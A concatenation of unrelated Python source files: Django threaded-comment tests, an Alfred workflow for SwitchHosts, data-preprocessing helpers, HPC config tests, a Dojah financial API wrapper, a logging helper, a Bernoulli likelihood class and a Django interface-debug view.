comments/replies") 
self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments, no replies") class ThreadStep2TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) def test_threaded_comments_step_2_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") c1, c2 = root.get_children() # comment 1 self.assertEqual(c1.get_children_count(), 2, "Expected comment 1 to have 2 replies") # comment 2 self.assertEqual(c2.get_children_count(), 0, "Expected comment 2 to have no replies") class ThreadStep3TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) def test_threaded_comments_step_3_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 5, "Expected to have 5 total comments and replices") def test_threaded_comments_step_3_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 5, "Expected to have 5 total comments and replies") c1, c2 = root.get_children() # comment 1 self.assertEqual(c1.get_children_count(), 2, "Expected comment 1 to have 2 replies") # comment 2 self.assertEqual(c2.get_children_count(), 1, "Expected comment 2 to have 1 reply") class ThreadStep4TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) thread_test_step_4(self.article_1) def test_threaded_comments_step_4_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 7, "Expected to have 7 total comments and replies") c1, c2 = root.get_children() def test_threaded_comments_step_4_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 7, "Expected to have 5 total comments and replies") c1, c2 = root.get_children() self.assertEqual(c1.get_children_count(), 2, "Expected 2 replies to comment 1") self.assertEqual(c2.get_children_count(), 1, "Expected 1 reply to comment 2") c1_children = c1.get_children() c2_children = c2.get_children() self.assertEqual(c1_children[1].get_children_count(), 1, "Expected 1 replies to comment 1, reply 2") self.assertEqual(c2_children[0].get_children_count(), 1, "Expected 1 reply to comment 2, reply 1") def test_threaded_comments_step_4_level_2(self): root = TreeComment.objects.get_root(self.article_1) class ThreadStep5TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) thread_test_step_4(self.article_1) thread_test_step_5(self.article_1) def test_threaded_comments_step_5_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() def 
test_threaded_comments_step_5_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() def test_threaded_comments_step_5_level_2(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() self.assertEqual(c1.get_children()[1].get_children()[0].get_children_count(), 1, "Expected 1 grandchild") self.assertEqual(c2.get_children()[0].get_children()[0].get_children_count(), 1, "Expected 1 grandchild") def test_exceed_max_thread_level_raises_exception(self): root = TreeComment.objects.get_or_create_root(self.article_1) LIMIT = settings.COMMENTS_TREE_MAX_THREAD_LEVEL with self.assertRaises(MaxThreadLevelExceededException): comment = root.get_descendants().order_by('-depth').first() print(f"Max Depth is {comment.thread_level}") while comment.thread_level < LIMIT: comment = comment.add_child(comment="Extending the level by one") comment.add_child(comment='This one should cause error') def add_comment_to_diary_entry(diary): root = TreeComment.objects.get_or_create_root(diary) root.add_child(comment='This is a diary comment') class DiaryBaseTestCase(DjangoTestCase): def setUp(self): self.day_in_diary = Diary.objects.create(body="About Today...") self.root = TreeComment.objects.get_or_create_root(self.day_in_diary) def test_max_thread_level_by_app_model(self): self.root = TreeComment.objects.get_or_create_root(self.day_in_diary) c = self.root for x in range(1, settings.COMMENTS_TREE_MAX_THREAD_LEVEL+1): c = c.add_child(comment=f"Comment level {x}") with self.assertRaises(MaxThreadLevelExceededException): c.add_child(comment="Comment should cause an exception now") class TestCommentsForModel(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_1(self.article_2) def test_get_comments_for_model_type(self): comments = TreeComment.objects.for_model(Article) self.assertEqual(len(comments), 4) def test_get_comments_for_model_object(self): comments = TreeComment.objects.for_model(Article()) self.assertEqual(len(comments), 0) def test_get_comments_for_model_instance(self): comments = TreeComment.objects.for_model(self.article_1) self.assertEqual(len(comments), 2) class TestCommentsManager(ArticleBaseTestCase): def setUp(self): super().setUp() self.root = TreeComment.objects.get_or_create_root(self.article_1) thread_test_step_1(self.article_1) thread_test_step_1(self.article_2) def test_validate_association_on_root(self): self.assertIsNotNone(self.root.assoc) self.root.assoc = None self.root.save() self.assertIsNone(self.root.assoc) self.root = TreeComment.objects.get_or_create_root(self.article_1) self.assertIsNotNone(self.root.assoc) def test_moderation(self): moderated = TreeComment.objects.in_moderation() self.assertEqual(len(moderated.all()), 0) c1 = TreeComment.objects.first() c1.is_public = False c1.save() moderated = TreeComment.objects.in_moderation() self.assertEqual(len(moderated.all()), 1) def test_count_for_model(self): count1 = TreeComment.objects.count_for_model(Article) count2 = TreeComment.objects.count_for_model(self.article_1) count3 = TreeComment.objects.count_for_model(self.article_2) self.assertEqual(4, count1) 
self.assertEqual(2, count2) self.assertEqual(2, count3) houTS/SwitchHosts # -*- coding: utf-8 -*- import sys # the workflow package below can be downloaded from: # https://github.com/deanishe/alfred-workflow/releases from workflow import Workflow, ICON_WEB, web def get_subtitle(item): content = item.get('content', '') return content.partition('\n')[0].strip() def main(wf): url = 'http://127.0.0.1:50761/api/list' r = web.get(url) # throw an error if request failed # Workflow will catch this and show it to the user r.raise_for_status() # Parse the JSON returned by pinboard and extract the posts result = r.json() items = result['data'] # Loop through the returned posts and add an item for each to # the list of results for Alfred for item in items: on = item.get('on', False) wf.add_item(title=item['title'], subtitle=get_subtitle(item), arg=item['id'], valid=True, icon='on.png' if on else 'off.png') # Send the results to Alfred as XML wf.send_feedback() if __name__ == '__main__': my_wf = Workflow() sys.exit(my_wf.run(main)) from django.urls import path from .views import TestView urlpatterns = [ path('', TestView.as_view()), ] import boto3, os import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sn ######################### # 전처리 ######################### def upload_s3(bucket, file_path, prefix): ''' bucket = sagemaker.Session().default_bucket() prefix = 'comprehend' train_file_name = 'test/train/train.csv' s3_train_path = upload_s3(bucket, train_file_name, prefix) ''' prefix_path = os.path.join(prefix, file_path) # prefix_test_path = os.path.join(prefix, 'infer/test.csv') boto3.Session().resource('s3').Bucket(bucket).Object(prefix_path).upload_file(file_path) s3_path = "s3://{}/{}".format(bucket, prefix_path) # print("s3_path: ", s3_path) return s3_path def filter_df(raw_df, cols): ''' cols = ['label','userno', 'ipaddr','try_cnt','paytool_cnt','total_amount','EVENT_DATE'] df = filter_df(df, cols) ''' df = raw_df.copy() df = df[cols] return df def split_data_date(raw_df, sort_col,data1_end, data2_start): ''' train, test 데이터 분리 train_end = '2020-01-31' test_start = '2020-02-01' train_df, test_df = split_data_date(df, sort_col='EVENT_DATE', data1_end = train_end, data2_start = test_start) ''' df = raw_df.copy() df = df.sort_values(by= sort_col) # 시간 순으로 정렬 # One-Hot-Encoding data1 = df[df[sort_col] <= data1_end] data2 = df[df[sort_col] >= data2_start] print(f"data1, data2 shape: {data1.shape},{data2.shape}") print(f"data1 min, max date: {data1[sort_col].min()}, {data1[sort_col].max()}") print(f"data2 min, max date: {data2[sort_col].min()}, {data2[sort_col].max()}") return data1, data2 def convert_date_type(raw_df, col1, dtype='str'): ''' train_pd = convert_date_type(train_pd, col1='customer_zip_code_prefix') ''' df = raw_df.copy() if df.columns.isin([col1]).any(): df[col1] = df[col1].astype(dtype) print(df[col1].dtypes) else: pass return df ######################### # 레이블 인코더 ######################### # from sklearn import preprocessing import numpy as np from sklearn.preprocessing import LabelEncoder class LabelEncoderExt(object): ''' Source: # https://stackoverflow.com/questions/21057621/sklearn-labelencoder-with-never-seen-before-values ''' def __init__(self): """ It differs from LabelEncoder by handling new classes and providing a value for it [Unknown] Unknown will be added in fit and transform will take care of new item. 
It gives unknown class id """ self.label_encoder = LabelEncoder() # self.classes_ = self.label_encoder.classes_ def fit(self, data_list): """ This will fit the encoder for all the unique values and introduce unknown value :param data_list: A list of string :return: self """ self.label_encoder = self.label_encoder.fit(list(data_list) + ['Unknown']) self.classes_ = self.label_encoder.classes_ return self def transform(self, data_list): """ This will transform the data_list to id list where the new values get assigned to Unknown class :param data_list: :return: """ new_data_list = list(data_list) for unique_item in np.unique(data_list): if unique_item not in self.label_encoder.classes_: new_data_list = ['Unknown' if x==unique_item else x for x in new_data_list] return self.label_encoder.transform(new_data_list) def make_test_label_encoding(raw_train_df, raw_test_df,cols): ''' label_cols = ['customer_city','customer_state','customer_zip_code_prefix'] train_pd_lb, test_pd_lb = make_test_label_encoding(train_pd, test_pd, label_cols) ''' train_df = raw_train_df.copy() test_df = raw_test_df.copy() for lb_col in cols: print("Starting: ", lb_col) le = LabelEncoderExt() le = le.fit(train_df[lb_col]) train_en = le.transform(train_df[lb_col]) test_en = le.transform(test_df[lb_col]) lb_col_name = 'lb_' + lb_col print("new col name: ", lb_col_name) train_df[lb_col_name] = train_en train_df[lb_col_name] = train_df[lb_col_name].astype('str') test_df[lb_col_name] = test_en test_df[lb_col_name] = test_df[lb_col_name].astype('str') return train_df, test_df ######################### # 평가 ######################### import itertools def plot_conf_mat(cm, classes, title, cmap = plt.cm.Greens): print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = 'd' thresh = cm.max() / 2. 
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="black" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') 1-10 from jsonextended import edict, utils # from jsonschema import ValidationError from atomic_hpc.config_yaml import format_config_yaml, renumber_config_yaml example_file_minimal = """ runs: - id: 1 name: run1 """ expected_output_minimal = [ { "description": "", "environment": "unix", "input": None, "output": { "remote": None, "path": "output", "remove": None, "rename": None }, "process": { "unix": { "run": None }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "24:00:00", "queue": None, "email": None, "modules": None, "run": None, "start_in_temp": True } }, "id": 1, "name": "run1" } ] example_file_maximal = """ defaults: description: quantum-espresso run environment: qsub input: remote: hostname: login.cx1.hpc.imperial.ac.uk username: cjs14 variables: var1: value var2: value nprocs: 2 files: file1: path/to/file1 scripts: - path/to/script1.in - path/to/script2.in output: remote: hostname: login.cx1.hpc.imperial.ac.uk username: cjs14 path: path/to/top/level/output remove: - tmp/ rename: .other.out: .other.qe.out process: unix: run: - mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out qsub: cores_per_node: 16 nnodes: 1 walltime: 1:00:00 queue: queue_name email: modules: - quantum-espresso - intel-suite - mpi run: - mpiexec pw.x -i script2.in > main.qe.scf.out runs: - id: 1 name: run1 input: variables: var1: overridevalue - id: 2 name: run2 input: scripts: - path/to/other/script1.in - path/to/script2.in variables: var2: overridevalue """ expected_output_maximal = [ { "description": "quantum-espresso run", "environment": "qsub", "input": { "path": None, "scripts": [ "path/to/script1.in", "path/to/script2.in" ], "files": { "file1": "path/to/file1" }, "binaries": None, "variables": { "var1": "overridevalue", "var2": "value", "nprocs": 2 }, "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None } }, "output": { "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None }, "path": "path/to/top/level/output", "remove": [ "tmp/" ], "rename": { ".other.out": ".other.qe.out" } }, "process": { "unix": { "run": [ "mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out" ] }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "1:00:00", "queue": "queue_name", "email": "", "modules": [ "quantum-espresso", "intel-suite", "mpi" ], "start_in_temp": True, "run": [ "mpiexec pw.x -i script2.in > main.qe.scf.out" ], } }, "id": 1, "name": "run1" }, { "description": "quantum-espresso run", "environment": "qsub", "input": { "path": None, "scripts": [ "path/to/other/script1.in", "path/to/script2.in" ], "files": { "file1": "path/to/file1" }, "binaries": None, "variables": { "var1": "value", "var2": "overridevalue", "nprocs": 2 }, "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None } }, "output": { "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", 
"port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None }, "path": "path/to/top/level/output", "remove": [ "tmp/" ], "rename": { ".other.out": ".other.qe.out" } }, "process": { "unix": { "run": [ "mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out" ] }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "1:00:00", "queue": "queue_name", "email": "", "modules": [ "quantum-espresso", "intel-suite", "mpi" ], "start_in_temp": True, "run": [ "mpiexec pw.x -i script2.in > main.qe.scf.out" ], } }, "id": 2, "name": "run2" } ] def test_format_minimal(): file_obj = utils.MockPath('config.yml', is_file=True, content=example_file_minimal) output = format_config_yaml(file_obj) # handy for updating # import json # print(json.dumps(output, indent=4)) assert edict.diff(output, expected_output_minimal) == {} def test_format_maximal(): file_obj = utils.MockPath('config.yml', is_file=True, content=example_file_maximal) output = format_config_yaml(file_obj) # handy for updating # import json # print(json.dumps(output, indent=4)) assert edict.diff(output, expected_output_maximal) == {} def test_renumber_config_yaml(): example_file = """ # a comment runs: - name: run1 - name: run2 - name: run3 - name: run4 - name: run5 - name: run6 """ in_file_obj = utils.MockPath('config.yml', is_file=True, content=example_file) out_file_obj = utils.MockPath('config.yml', is_file=True, content="") renumber_config_yaml(in_file_obj, out_file_obj) expected = """File("config.yml") Contents: # a comment runs: - name: run1 id: 1 - name: run2 id: 2 - name: run3 id: 3 - name: run4 id: 4 - name: run5 id: 5 - name: run6 id: 6""" assert out_file_obj.to_string(file_content=True) == expected """ The financial services APIs are available to retrieve financial information of users from various banks via internet banking. To make use of these APIs, you must have been verified on the Dojah app. The widget is the interface your users see when they need to submit the internet details. You can set up the widget here https://api-docs.dojah.io/docs/financial-widget. Our financial widget process flow: Your application allows your end users to launch the widget The end user fills the registration process which includes selecting financial institution etc. After successful completion, the widget returns a secret key in your Dojah application which would be used to make APIs calls """ from dojahcore.core import DojahBase class Financial(DojahBase): """ """ @classmethod def account_information(cls,account_id): """ Retrieves the bank account information of a customer. params : account_id : str -> required - Gotten from the financial widget """ response = cls().requests.get('/api/v1/financial/account_information',query =[('account_id',account_id)]) return response @classmethod def account_transactions(cls, account_id, last_transaction_id=None, start_date=None, end_date=None, trans_type=None, response_mode=None, callback_url=None): """ This endpoint allows users retrieve customer's transaction details from their bank accounts. Transaction details include the bank name linked to the transaction, amount, location, transaction type (credit or debit), time, and date of occurrence. 
params : account_id : str -> required - Gotten from the financial widget last_transaction_id : str -> optional - the oldest transaction ID you want to start with start_date : str -> optional - the start date of transaction you want to get end_date : str -> optional - the end date of transaction you want to get trans_type : str -> optional - (debit or credit) response_mode : str -> optional - Your preferred mode of results. (paginated, not_paginated, or webhook) Defaults to paginated callback_url : str -> optional - callback url used as webhook returns : Json data from Dojah API """ query = { 'account_id': account_id } if last_transaction_id: query['last_transaction_id'] = last_transaction_id if start_date: query['start_date'] = start_date if end_date: query['end_date'] = end_date trans_types = ['credit','debit'] if trans_type: if trans_type in trans_types: query['trans_type']= trans_type else: raise ValueError('transaction type should be credit or debit') response_modes = ['paginated', 'not_paginated', 'webhook'] if response_mode: if response_mode in response_modes: query['response_mode'] = response_mode else: raise ValueError("response_mode should be paginated, not_paginated or webhook") if response_mode == 'webhook' and not callback_url: raise ValueError('Callback Url required for webhook response type') if callback_url: query['callback_url'] = callback_url response = cls().requests.get('/api/v1/financial/account_transactions',query=query) return response @classmethod def account_subscription(cls, account_id, start_date=None, end_date=None, status=None): """ This endpoint allows you to retrieve recurring payments that occur daily, weekly, monthly, or yearly from transactions. The endpoint returns the transaction date, amount, the name of the service that the service subscribed to (e.g. Netflix), the subscription duration (i.e. yearly or monthly subscription), etc. params : account_id : str -> required - account ID gotten from the widget start_date : str -> optional - the start date of transaction you want to get end_date : str -> optional - the end date of transaction you want to get status : str -> optional - (expired or not_expired) returns: Json data from Dojah API """ query = { 'account_id': account_id } statuses = ['expired','not_expired'] if status: if status in statuses: query['status'] = status else: raise ValueError('Status should be either of expired or not_expired') if start_date: query['start_date'] = start_date if end_date: query['end_date'] = end_date response = cls().requests.get('/api/v1/financial/account_subscription', query=query) return response @classmethod def earning_structure(cls,account_id,duration): """ This endpoint allows developers to determine if a customer is a salary earner, and to determine the amount of employer's income. params : account_id : str -> required - account id gotten from the widget duration : str -> optional - (6_months,12_months,24_months) returns : Json data from Dojah API """ query = { 'account_id': account_id } durations = ['6_moonths','12_months','24_months'] if duration in durations: query['duration'] = duration response = cls().requests.get('/api/v1/financial/earning_structure',query=query) return response @classmethod def spending_pattern(cls, account_id, duration): """ This endpoint gives insights on users' spending habits based on transactions, and it comes in percentages. 
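# --- Hedged usage sketch (not part of the original sources) ---------------------
# Example call against the account_transactions wrapper defined above. It assumes
# the dojahcore client has already been configured with your Dojah app credentials,
# and the account_id placeholder would come from the financial widget flow
# described at the top of this module. Dates and filters are illustrative.
account_id = '<account-id-from-widget>'              # placeholder, returned by the widget
transactions = Financial.account_transactions(
    account_id,
    start_date='2021-01-01',
    end_date='2021-03-31',
    trans_type='debit',                              # must be 'credit' or 'debit'
    response_mode='paginated',                       # 'paginated', 'not_paginated' or 'webhook'
)
print(transactions)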
params : account_id : str -> required - account id gotten from the widget duration : str -> optional - (6_months,12_months,24_months) returns : Json data from Dojah API """ query = { 'account_id': account_id } durations = ['6_moonths','12_months','24_months'] if duration in durations: query['duration'] = duration response = cls().requests.get('/api/v1/financial/spending_pattern',query=query) return response @classmethod def categorize_transactions(cls, description, trans_type): """ This endpoint allows you to categorize your transactions using our machine learning model and merchant validation system. params : description : str -> required - description of the transaction trans_type : str -> required - (debit or credit) returns : Json data from Dojah API """ if not description: raise ValueError('Description can not be None') body = { 'description': description } trans_types = ['credit','debit'] if trans_type: if trans_type in trans_types: body['trans_type'] = trans_type else: raise ValueError('trans_type must be either of credit or debit') else: raise ValueError('trans_type can not be None') response = cls().requests.post('/api/v1/ml/categorize_transaction',body=body) return response @classmethod def send_transactions(cls, transactions): """This endpoint will post the transactions and return an account_id. params : transactions : array of transactions sample : [ { "transaction_date":"2021-04-30", "transaction_type":"credit", "transaction_amount":"2016.4", "reference_number":"12345tgfnde", "transaction_description":"0033199479:Int.Pd:01-04-2021 to 30-04-2 |" } ] returns : Json Data from Dojah API """ body ={ 'transactions': transactions } response = cls().requests.post('/api/v1/financial/transactions',body=body) return response @classmethod def update_transactions(cls, account_id, transactions): """ This endpoint will update transactions params : transactions : array of transactions sample : [ { "transaction_date":"2021-04-30", "transaction_type":"credit", "transaction_amount":"2016.4", "reference_number":"12345tgfnde", "transaction_description":"0033199479:Int.Pd:01-04-2021 to 30-04-2 |" } ] returns : Json Data from Dojah API """ body ={ 'transactions': transactions } response = cls().requests.put('/api/v1/financial/transactions/{}'.format(account_id),body=body) return response import pytz import logging from logging.handlers import TimedRotatingFileHandler from datetime import datetime, timedelta from logging.config import fileConfig from settings import LOG_LEVEL TIMEZONE = 'Asia/Hong_Kong' time_zone = pytz.timezone(TIMEZONE) def posix2local(timestamp, tz=time_zone): """Seconds since the epoch -> local time as an aware datetime object.""" return datetime.fromtimestamp(timestamp, tz) class Formatter(logging.Formatter): def converter(self, timestamp): return posix2local(timestamp) def formatTime(self, record, datefmt=None): dt = self.converter(record.created) if datefmt: s = dt.strftime(datefmt) else: t = dt.strftime(self.default_time_format) s = self.default_msec_format % (t, record.msecs) return s def get_logger(log_name, log_fname=None, log_level=None): try: fileConfig('logging_cfg.ini') except Exception as err: fileConfig('funds_crawler/logging_cfg.ini') if not log_fname: log_fname = log_name + '.log' log_fname = 'logs/' + log_fname # log_name = datetime.now(time_zone).strftime("%Y%m%d") + '.log' format_str = "%(asctime)s [%(name)-2s] %(levelname)-2s: %(message)s" # file_handler = logging.FileHandler(log_name) # Apply the timerotating file logger. 
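# --- Hedged worked example (not part of the original sources) -------------------
# Quick check of the timezone handling above: posix2local converts an epoch
# timestamp into an aware datetime in the Asia/Hong_Kong zone configured by
# TIMEZONE, which is what the custom Formatter uses for log record times.
# The expected value below assumes pytz resolves Hong Kong time as UTC+08:00.
print(posix2local(1600000000).isoformat())   # expected: '2020-09-13T20:26:40+08:00'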
file_handler = TimedRotatingFileHandler(log_fname, when='midnight', interval=1, backupCount=7) if not log_level: log_level = LOG_LEVEL file_handler.setLevel(LOG_LEVEL) file_handler.setFormatter(Formatter(format_str)) if not log_name: logger = logging.getLogger(log_name) else: logger = logging.getLogger(log_name) logger.addHandler(file_handler) return logger likelihoods/bernoulli.py # # () # Universidad Carlos III de Madrid # May 2020 import torch import numpy as np from likelihoods.likelihood import Likelihood from torch.distributions.normal import Normal from torch.distributions.bernoulli import Bernoulli as Ber class Bernoulli(Likelihood): """ Class for Gaussian Likelihood """ def __init__(self): super(Bernoulli, self).__init__() def pdf(self, f, y): sigmoid = torch.nn.Sigmoid() p = sigmoid(f)#.flatten() bernoulli = Ber(probs=p) pdf = torch.exp(bernoulli.log_prob(y)) return pdf def logpdf(self, f, y): sigmoid = torch.nn.Sigmoid() p = sigmoid(f).flatten() bernoulli = Ber(probs=p) logpdf = bernoulli.log_prob(y) return logpdf def variational_expectation(self, y, m, v): # Gauss-Hermite Quadrature gh_p, gh_w = self.gh_points() gh_w = torch.div(gh_w, np.sqrt(np.pi)) m, v, y = m.flatten(), v.flatten(), y.flatten() f = gh_p[None, :] * torch.sqrt(2. * v[:, None]) + m[:, None] y = y[:,None].repeat(1,f.size(1)) logp = self.logpdf(f.view(-1), y.view(-1)) logp = logp.view(f.size()).double() gh_w = gh_w[:, None] var_exp = logp.mm(gh_w) return var_exp def log_predictive(self, y_test, mu_gp, v_gp, num_samples=1000): N_test = y_test.size(0) # function samples: normal = Normal(loc=mu_gp.flatten(), scale=torch.sqrt(v_gp).flatten()) f_samples = torch.reshape(normal.sample(sample_shape=(1,num_samples))[0,:,:], (-1,)) # monte-carlo: logpdf = self.logpdf(f_samples, y_test.repeat(num_samples,1).flatten()) log_pred = -np.log(num_samples) + torch.logsumexp(logpdf, dim=0) return -log_pred from django.shortcuts import render,HttpResponse from apps.interface.services.HTTP_interface_debugService import HTTP_interfaceDebugService from apps.common.func.CommonFunc import * from apps.common.func.LanguageFunc import * from apps.common.helper.ApiReturn import ApiReturn from AutotestWebD import settings import json,time,logging from apps.common.func.WebFunc import * from apps.common.model.RedisDBConfig import * from all_models.models import * logger = logging.getLogger("web") def interfaceDebugAdd(request): testDebugId = "interfaceDebug_%s_%s" % (request.session.get("loginName"),int(time.time() * 1000)) if request.method != 'POST': addUserLog(request, "单接口管理->添加接口调试->请求方式错误", "FAIL") return HttpResponse(ApiReturn(ApiReturn.CODE_METHOD_ERROR,"请求方式错误","").toJson()) data = json.loads(request.POST.get("interfaceData")) data['version'] = request.session.get("version") if data["method"] != "GET" and data["method"] != "HEAD": file = request.FILES bodyContent = data["bodyContent"] bodyType = data["bodyType"] if bodyType == "binary": if "realPath" in bodyContent: data["bodyContent"] = json.dumps(bodyContent,ensure_ascii=False) else: if not file.get("file"): pass thisFile = file.get("file") contentRealPath = updateFileSave(request.session.get("loginName"), thisFile, "0") bodyContent["realPath"] = contentRealPath bodyContent["fileType"] = thisFile.content_type data["bodyContent"] = json.dumps(bodyContent,ensure_ascii=False) elif bodyType == "form-data": fileDict = request.FILES keyCountDict = {} for i in range(0,len(bodyContent)): tmpAttr = bodyContent[i] if tmpAttr['type'] == "file": if "realPath" in bodyContent[i]["value"]: continue 
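# --- Hedged sanity check (not part of the original sources) ---------------------
# Small check of the Bernoulli likelihood defined above: logpdf(f, y) should match
# the closed form y*log(sigmoid(f)) + (1-y)*log(1-sigmoid(f)) elementwise. This
# assumes torch is available and that the Likelihood base class can be
# instantiated without extra arguments.
lik = Bernoulli()
f = torch.tensor([0.5, -1.0, 2.0])
y = torch.tensor([1.0, 0.0, 1.0])
print(lik.logpdf(f, y))
print(y * torch.log(torch.sigmoid(f)) + (1 - y) * torch.log(1 - torch.sigmoid(f)))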
fileKey = tmpAttr['key'] if fileKey in keyCountDict.keys(): keyCountDict[fileKey] += 1 else: keyCountDict[fileKey] = 0 tmpFileTempObj = fileDict.getlist(fileKey)[keyCountDict[fileKey]] contentRealPath = updateFileSave(request.session.get("loginName"), tmpFileTempObj, keyCountDict[fileKey]) bodyContent[i]['value']['fileType'] = tmpFileTempObj.content_type bodyContent[i]['value']['realPath'] = contentRealPath data["bodyContent"] = json.dumps(bodyContent,ensure_ascii=False) data['actualResult'] = '' data['assertResult'] = '' data['testResult'] = "NOTRUN" data['execStatus'] = 1 data['beforeExecuteTakeTime'] = 0 data['executeTakeTime'] = 0 data['afterExecuteTakeTime'] = 0 data['totalTakeTime'] = 0 data['businessLineId'] = data["businessLineId_id"] data['moduleId'] = data["moduleId_id"] data['httpConfKey'] = data["httpConfKey_id"] langDict = getLangTextDict(request) try: RedisCache().set_data(testDebugId,json.dumps(data),60*60) #初始设置接口debug的时间是1小时 # debugId = HTTP_interfaceDebugService.interfaceDebugAdd(data,request.session.get("loginName")).id except Exception as e: logging.error(traceback.format_exc()) addUserLog(request, "单接口管理->添加接口调试->插入失败,原因\n%s" % ApiReturn(ApiReturn.CODE_INTERFACE_DEBUG_ADD_EXCEPITON,langDict['web']['httpInterfaceDebugAddException'],"%s" % e).toJson(), "FAIL") return HttpResponse(ApiReturn(ApiReturn.CODE_INTERFACE_DEBUG_ADD_EXCEPITON,langDict['web']['httpInterfaceDebugAddException'],"%s" % e).toJson()) addUserLog(request, "单接口管理->添加接口调试->成功" , "PASS") # return HttpResponse(ApiReturn(ApiReturn.CODE_OK,langDict['web']['httpInterfaceDebugAdd'],str(debugId)).toJson()) return HttpResponse(ApiReturn(ApiReturn.CODE_OK,langDict['web']['httpInterfaceDebugAdd'],testDebugId).toJson()) def debugInterface(request): langDict = getLangTextDict(request) testDebugId = request.POST.get("body") #aaabbb tcpStr = '{"do":1,"InterfaceDebugId":"%s"}' % testDebugId retApiResult = send_tcp_request(tcpStr) if retApiResult.code != ApiReturn.CODE_OK: debugMsg = {} debugMsg["execStatus"] = 4 debugMsg["actualResult"] = str(retApiResult.code)+":"+retApiResult.message debugMsg["assertResult"] = str(retApiResult.code)+":"+retApiResult.message debugMsg["modTime"] = datetime.datetime.now() RedisCache().del_data(testDebugId) # HTTP_interfaceDebugService.setDebugFail(request.session.get("loginName"),debugMsg) addUserLog(request, "单接口管理->接口调试->发送TCP请求->失败,原因\n%s" % retApiResult.toJson(), "FAIL") return HttpResponse(retApiResult.toJson()) else: addUserLog(request, "单接口管理->接口调试->发送TCP请求->成功", "PASS") return HttpResponse(ApiReturn(ApiReturn.CODE_OK, langDict['web']['httpInterfaceDebugSuccess']).toJson()) def getDebugResult(request): langDict = getLangTextDict(request) startTime = time.time() testDebugId = request.POST.get("body") while True: if (time.time() - startTime) >= 1: return HttpResponse(ApiReturn(ApiReturn.CODE_DEBUG_TIMEOUT, langDict['web']['httpDebugTimeout']).toJson()) try: debugResult = json.loads(RedisCache().get_data(testDebugId)) except Exception as e: print(traceback.format_exc()) return HttpResponse(ApiReturn(ApiReturn.CODE_ERROR, "调试结果解析异常,请联系管理员").toJson()) if debugResult["execStatus"] == 3 or debugResult["execStatus"] == 4: debugResult["alias"] = TbConfigHttp.objects.get(httpConfKey=debugResult["httpConfKey"]).alias RedisCache().del_data(testDebugId) addUserLog(request, "单接口管理->接口调试->获取结果->成功", "PASS") return render(request,"InterfaceTest/HTTPInterface/SubPages/HTTP_interface_debug_page.html",debugResult) if __name__=="__main__": print(settings.BASE_DIR)""" Summary: Contains the 
